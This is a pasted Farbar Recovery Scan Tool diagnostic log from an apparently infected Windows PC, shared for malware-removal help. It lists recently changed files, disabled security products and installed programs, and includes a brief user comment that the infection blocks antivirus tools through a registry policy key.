2014-08-22 14:32 - 2014-08-22 15:42 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-23 11:16 - 00000782 _____ () C:\Windows\setupact.log
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-23 16:22 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 18:19 - 2014-08-22 13:27 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-23 16:54 - 2014-07-18 00:39 - 01159804 _____ () C:\Windows\WindowsUpdate.log
2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-23 16:27 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-23 16:22 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-23 16:21 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2014-08-23 16:21 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-23 16:21 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-23 16:20 - 2014-08-22 16:12 - 00038790 _____ () C:\Windows\PFRO.log
2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt
2014-08-23 16:16 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox
2014-08-23 16:13 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini
2014-08-23 14:48 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas
2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss
2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-08-23 14:20 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT
2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis
2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:25 - 2014-08-23 11:23 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk
2014-08-23 11:16 - 2014-08-22 13:25 - 00000782 _____ () C:\Windows\setupact.log
2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-23 11:05 - 2014-08-23 11:02 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-22 15:42 - 2014-08-22 14:32 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:27 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-21 22:25 - 2011-12-22 18:52 - 00000680 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat
2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google
2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google
2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG
2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC
2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix
2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc
2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office
2014-08-15 19:54 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system
2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple
2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-12 16:51 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-23 16:28
 
==================== End Of Log ============================

Forgot to mention that this infection also edits the safer key in the registry to disable the anti-viral programs on the computer. Removing the safer\codeidentifiers\0\path part of the key allows those programs to run until the block is put back in place a few minutes later.

 

Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-23 16:55:17
Running from F:\
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden
6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden
6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)
Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden
ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)
Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)
Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)
Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )
AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)
AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.1416 - AVG Technologies) Hidden
AVG 2011 (Version: 10.0.2109 - AVG Technologies) Hidden
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden
Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)
BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden
Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden
Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden
